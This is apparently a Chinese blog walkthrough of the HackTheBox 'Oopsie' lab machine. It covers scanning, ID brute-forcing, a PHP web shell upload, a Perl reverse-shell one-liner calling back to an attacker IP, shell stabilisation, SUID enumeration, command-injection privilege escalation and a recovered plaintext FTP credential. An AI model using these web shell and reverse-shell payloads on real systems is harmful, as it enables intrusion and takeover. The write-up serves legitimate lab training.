HackTheBox Starting Point Oopsie .28

Posted by Mr.Be1ieVe on Friday, December 4, 2020

扫描结果

Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-03 06:15 EST
Nmap scan report for 10.10.10.28
Host is up (0.49s latency).

PORT     STATE  SERVICE          VERSION
21/tcp   closed ftp
23/tcp   closed telnet
53/tcp   closed domain
80/tcp   open   http             Apache httpd 2.4.29 ((Ubuntu))                                                                                                                                                                            
|_http-server-header: Apache/2.4.29 (Ubuntu)                                                                                                                                                                                               
|_http-title: Welcome                                                                                                                                                                                                                      
110/tcp  closed pop3                                                                                                                                                                                                                       
111/tcp  closed rpcbind                                                                                                                                                                                                                    
113/tcp  closed ident                                                                                                                                                                                                                      
135/tcp  closed msrpc
139/tcp  closed netbios-ssn
143/tcp  closed imap
256/tcp  closed fw1-secureremote
445/tcp  closed microsoft-ds
587/tcp  closed submission
993/tcp  closed imaps
995/tcp  closed pop3s
1723/tcp closed pptp
3306/tcp closed mysql
3389/tcp closed ms-wbt-server
5900/tcp closed vnc
8080/tcp closed http-proxy
8888/tcp closed sun-answerbook

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.00 seconds

打开对应80端口 http://10.10.10.28/#

看了看没有啥,扫描路径走起

扫出来一个登录 http://10.10.10.28/cdn-cgi/login/i

密码用的是前面window机器获取的!!!wdnmd

进去之后,Account页面

http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=1

这个id = 1,爆破一下之后,爆出来30的时候查询到了super admin的id和账户

而在upload界面,就需要super admin的cookie才能访问到上传

使用dirsearch工具可以找到/uploads/。 上传的php就保存到了这里

这里我使用php一句话反弹shell连上就断,使用perl就可以正常连接。

test.php <?php echo shell_exec($_GET['shell']);?>

访问link http://10.10.10.28/uploads/test.php?shell=perl%20-MIO%20-e%20%27$p=fork;exit,if($p);$c=new%20IO::Socket::INET(PeerAddr,%2210.10.14.214:4444%22);STDIN-%3Efdopen($c,r);$~-%3Efdopen($c,w);system$_%20while%3C%3E;%27

对应perl命令perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:4242");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

可看swisskyrepo/PayloadsAllTheThings

连进去之后需要提权

SHELL=/bin/bash script -q /dev/null   //见注解1
Ctrl-Z          //见注解2
stty raw -echo        //见注解3
fg           //见注解4
reset          //见注解5
xterm          //见注解6
  1. 将在环境变量下将shell设置为/bin/bash且参数为-q和/dev/null的情况下运行脚本,-q参数为静默运行,输出到/dev/null(黑洞)里,如果不加script -q /dev/null不会新启一个bash,shell=/bin/bash只是设置shell为bash,加了以后会给你挂起一个新的shell,并帮你记录所有内容
  2. 将netcat暂挂至后台
  3. 将本地终端置于原始模式,以免干扰远程终端
  4. 将netcat返回到前台,注意:这里不会显示输入的命令
  5. 重置远程终端,经测试也可以不进行此操作
  6. 运行xterm 来源 渗透测试练习靶场hackthebox——Starting Point Oopsie攻略_TF0xn的博客-CSDN博客

在目录之间找了找之后,在cdn-cgi/login找到个db.php,里边有个账户密码,su 切换过去就有了用户权限。

ls -lh $(find / -perm -u=s -type f 2>/dev/null)查看有SUID权限 的可执行文件

使用cat /etc/group查看bugtracker用户组

发现可以运行就直接/usr/bin/bugtracker执行了,发现看起来是个cat的代码执行,尝试;命令注入成功,获取了root权限

ls -lRa /root查找root路径下有什么

-R, –recursive list subdirectories recursively

Inside root’s folder, we see a .config folder, which contains a FileZilla config file with the credentials ftpuser / mc@F1l3ZilL4 visible in plain text.

「真诚赞赏,手留余香」

Mr.Be1ieVe's Treasure

真诚赞赏,手留余香

使用微信扫描二维码完成支付